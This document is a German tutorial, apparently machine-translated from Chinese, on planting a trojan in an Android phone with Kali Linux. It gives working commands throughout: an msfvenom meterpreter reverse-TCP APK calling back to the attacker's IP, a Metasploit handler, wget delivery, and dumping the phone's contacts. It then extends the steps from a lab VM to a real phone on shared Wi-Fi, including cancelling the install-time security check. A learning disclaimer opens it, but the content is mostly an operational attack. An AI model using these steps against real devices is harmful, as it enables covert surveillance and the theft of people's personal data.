Haftungsausschluss: Der folgende Inhalt dient nur als Lernreferenz. Wenn Sie ihn auf illegale Weise verwenden, sind Sie für die Folgen verantwortlich. Ich hoffe, dass jeder ein guter Bürger ist, der sich an die Gesetze hält und gemeinsam die Netzwerksicherheit des Landes schützt! ! !
Artikelverzeichnis
Umweltvorbereitung
Angriffsflugzeug: Kali
Zielmaschine: Android
1. Einbruchsoperation
1. Herstellung von Trojanischen Pferden
Indem man msfvenom
einen Android-Trojaner erstellt
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.9.136.152 LPORT=4444 R >android_yuanboss.apk
2. Öffnen Sie den HTTP-Dienst
Geben Sie im Terminal kali
den folgenden Befehl ein , um den http-Dienst zu starten
python3 -m http.server 80
3. Der Zielcomputer lädt das Trojanische Pferd herunter
Aufgrund des Fehlers der virtuellen Android-Maschine können wir den entsprechenden Befehl nicht im Browser der Zielmaschine eingeben, ip
um den Trojaner herunterzuladen, sondern müssen den Befehl im Terminal eingeben, um den Trojaner herunterzuladen:
Terminal-Download-Befehl:
wget 10.9.136.152/android_yuanboss.apk
Es wurde jedoch festgestellt, dass der Download fehlgeschlagen ist, da das aktuelle Verzeichnis von Android ein schreibgeschütztes Dateisystem ist. Wenn wir etwas herunterladen müssen, müssen wir es in das SD-Kartenverzeichnis herunterladen:
cd sdcard
wget 10.9.136.152/android_yuanboss.apk
Wie in der Abbildung gezeigt, bedeutet dies, dass der Download erfolgreich war:
4. Installieren Sie den Trojaner
Nach dem Öffnen der Datei in Android, wie in der Abbildung gezeigt:
Das letzte ist das Trojanische Pferd, das wir heruntergeladen haben. Wir können es auf dumme Weise direkt installieren und darauf achten, die Sicherheitsüberprüfung während des Installationsvorgangs abzubrechen.
Nach der Installation sehen Sie auf dem Desktop folgendes Symbol:
5. Überwachungskonfiguration
1. Wählen Sie das Backdoor-Modul aus ( Sie müssen das Modul in diesem Schritt auswählen, sonst können Sie nicht mit den folgenden Schritten fortfahren ).
use exploit/multi/handler
2. Legen Sie die Angriffslast fest payload
(identisch mit der Last für die Erstellung eines Trojanischen Pferdes).
set payload android/meterpreter/reverse_tcp
3. Legen Sie die Angriffsebene fest ip
(wie beim Erstellen des Trojanischen Pferdes ip
).
set lhost 10.9.136.152
4. Stellen Sie den Port des angreifenden Computers ein port
(derselbe wie der Port beim Erstellen des Trojanischen Pferdes).
set lport 4444
Die obige Überwachungskonfiguration ist in der Abbildung dargestellt:
6. Starten Sie die Überwachung
run
wie das Bild zeigt:
7. Trojanisches Pferd online
Öffnen Sie das Trojaner-Programm auf dem Zielcomputer
8. Die Überwachung ist erfolgreich
2. Penetrationsvorgang
1. Erhalten Sie Telefonkontakte
Fügen Sie zunächst Informationen zum Adressbuch auf dem Zielcomputer hinzu, führen Sie dann das Trojaner-Programm aus und
kali
führen Sie dann den folgenden Befehl auf dem Zielcomputer aus:
dump_contacts
Anhand des Protokolls können wir erkennen, dass die Adressbuchinformationen in contacts_dump_20230607062727.txt
der Datei im aktuellen Verzeichnis gespeichert sind
cat
Als nächstes sehen Sie sich die Datei mit dem folgenden Befehl an:
Wir können sehen, dass die Adressbuchinformationen erfolgreich abgerufen wurden
3. Tatsächlicher Kampf gegen die Einpflanzung von Trojanern in Mobiltelefone
Die praktische Logik ist dieselbe wie im obigen Inhalt. Solange Sie sicherstellen, dass eine kali
Verbindung zum Mobiltelefon hergestellt werden kann ip
, können Sie die Implantation eines Trojaners implementieren.
Die Schwierigkeit liegt also darin, wie wir eine Verbindung kali
zum Mobiltelefon herstellen. kali
Der Vorgang zum Herstellen einer Verbindung mit dem Android-Telefon ist wie folgt:
Wie in der folgenden Abbildung gezeigt, müssen wir nur sicherstellen, dass unser Computer und unser Android-Telefon mit demselben WLAN-Router verbunden sind. Um sicherzustellen, dass sich Kali in der physischen Maschine im selben Netzwerksegment wie das Android-Telefon befinden kann, benötigen wir um es in den Bridge-Modus zu versetzen und im virtuellen
kali
Netzwerk im Editor die Bridge-Netzwerkkarte als drahtlose Netzwerkkarte festzulegen. Der Name der drahtlosen Netzwerkkarte kann im Batch-Fenster der physischen Maschine angezeigt werden. Die Beschreibungipconfig /all
der WLAN-Adapter WLAN ist der Name der WLAN-Karte. Überprüfen Sie nach der Konfiguration der virtuellen Maschinekali
die IP-Adresse des Android-Telefons. Sie können feststellen, dass es sich im selben Netzwerksegment befindet, und Sie können das Android-Telefon über Kali anpingenip
.
Nachdem Sie sichergestellt haben kali
, dass die Verbindung zu Android erfolgreich hergestellt wurde, führen Sie die oben genannten Einbruchs- und Penetrationsvorgänge aus!
Viertens. Zusammenfassung
Android-Intrusion ist dasselbe wie Windows, Sie müssen lediglich sicherstellen, dass das Netzwerk zwischen dem angreifenden Computer und dem Zielcomputer verbunden werden kann, um Durchdringung und Auslastung zu erreichen.
Beachten Sie, dass Android-Dateien nur Leseberechtigungen haben. Zum Herunterladen von Dateien müssen wir in das SD-Kartenverzeichnis wechseln
Der Befehl zum Herunterladen der Datei lautet:
wget ip/文件名
例如: weget 10.9.136.152/android_yuanboss.apk
Führen Sie den oben genannten Einbruchs- und Penetrationsvorgang aus!